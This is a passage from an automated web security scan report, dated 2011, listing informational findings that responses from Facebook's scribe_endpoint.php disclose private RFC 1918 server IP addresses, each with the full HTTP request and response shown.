GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1215%2C%22baseline_elapsed%22%3A1215%7D&asyncSignal=8579 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb70d824c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.60.35
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.395. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.198.46

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1517%2C%22baseline_elapsed%22%3A1712%7D&asyncSignal=8425 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.198.46
X-Cnection: close
Date: Thu, 16 Jun 2011 14:45:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.396. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.255.23

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A158%2C%22baseline_elapsed%22%3A309%7D&asyncSignal=7012 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3101dd6ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.255.23
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.397. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.177.59

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1214%2C%22baseline_elapsed%22%3A1195%7D&asyncSignal=195 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236de4684%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.177.59
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:19 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.398. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.105.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1480%2C%22baseline_elapsed%22%3A1497%7D&asyncSignal=384 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.105.36
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:19 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.399. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.131.27

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1217%2C%22baseline_elapsed%22%3A1217%7D&asyncSignal=6802 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d98a088%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.131.27
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.400. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.166.132

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A982%2C%22baseline_elapsed%22%3A1162%7D&asyncSignal=5384 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32ce464f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.166.132
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.401. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.219.30

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1505%2C%22baseline_elapsed%22%3A1505%7D&asyncSignal=7450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17d218344%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.219.30
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:06 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.402. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.59

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1516%2C%22baseline_elapsed%22%3A1572%7D&asyncSignal=4451 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.180.59
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:51 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.403. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.183.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1513%2C%22baseline_elapsed%22%3A1592%7D&asyncSignal=2216 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.183.35
X-Cnection: close
Date: Thu, 16 Jun 2011 18:48:07 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.404. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.168.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2950%2C%22baseline_elapsed%22%3A2950%7D&asyncSignal=4412 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df283f04cd%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.168.58
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:49 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.405. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.183.60

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1217%2C%22baseline_elapsed%22%3A1172%7D&asyncSignal=2355 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0e6822%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.183.60
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.406. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.230.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A515%2C%22baseline_elapsed%22%3A557%7D&asyncSignal=7593 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1414cf0a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.230.36
X-Cnection: close
Date: Thu, 16 Jun 2011 12:41:03 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.407. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.204.64

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A5950%2C%22baseline_elapsed%22%3A5914%7D&asyncSignal=2568 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a803aa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702303714704576384051388321740.html%3Fmod%3DWSJ_hp_mostpop_read&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.204.64
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.408. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.95.132

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1208%2C%22baseline_elapsed%22%3A1208%7D&asyncSignal=1625 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2299b5cf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.95.132
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.409. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1329%2C%22baseline_elapsed%22%3A1329%7D&asyncSignal=1952 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14add876c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
